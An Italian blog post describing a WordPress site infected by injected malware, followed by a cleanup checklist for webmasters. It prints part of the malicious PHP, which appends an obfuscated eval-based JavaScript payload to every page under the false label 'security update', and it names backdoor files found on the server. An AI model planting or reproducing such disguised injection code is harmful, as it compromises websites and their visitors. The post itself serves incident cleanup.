Voglia di Linux

Questo articolo è stato pubblicato 2 anni 1 mese 22 giorni giorni fa quindi alcuni contenuti o informazioni presenti in esso potrebbero non essere più validi. Questo sito non è responsabile per eventuali errori causati da questo problema.

All’ apertura del sito appare:

Attenzione: l’apertura di questo sito potrebbe danneggiare il tuo computer!

e nei risultati d ricerca:

www.sito.com
Questo sito potrebbe arrecare danni al tuo computer.

L’infezione aggiungeva uno script in fondo a tutte la pagine. In index.php e altri file si trovava il codice che conteneva:

<?php ob_start('security_update'); function security_update($buffer){return $buffer.'<script language="javascript">function t(){return z($a);}var $a="Z73tZ3dZ22Z2573tZ253dZ2522Z2524Z2561Z253dstZ253bdZ2563Z2573Z2528Z2564Z2561+
Z2564Z2562Z252bdZ2563+Z2564Z2564+Z2564eZ252cZ2531Z2530Z2529;Z2564Z ecc ecc
=0;eval(t());';}//important security update ?>

Se sono compromesse installazioni wordpress (nel mio caso):

• Segnarsi la data di modifica di index.php e/o altri file infetti
• cambiare passwd FTP e assicurarsi che sul proprio PC non siano presenti trojan che leggano il passwd di client come filezilla. Magari usare un cd live di ubuntu per pulire il sito, nel dubbio
• reinstallare wordpress, joomla ecc, e nel caso che i file di wordpress si trovano in un altra directory del sito sostituire il file index.php, che nel caso che sia infetto pesa 6.5kb invece di 104b.
• Controllare la data di modifica degli script in /cgi-bin e sostituirli con i backup nel caso che siano infetti. Nel caso mio erano infetti anche counter.cgi che viene chiamato da molte pagine.Controllare anche eventuali file *.htm che sono modificati, nel caso mio c'erano 3 o 4 infetti con uno javascript.
• Controllare se è presente un script tipo "chat.pl", nel caso mio era un backdoor per accedere al server senza passwd e eliminarlo
• Controllare se nella root sia presente mailcheck.php e eliminarlo.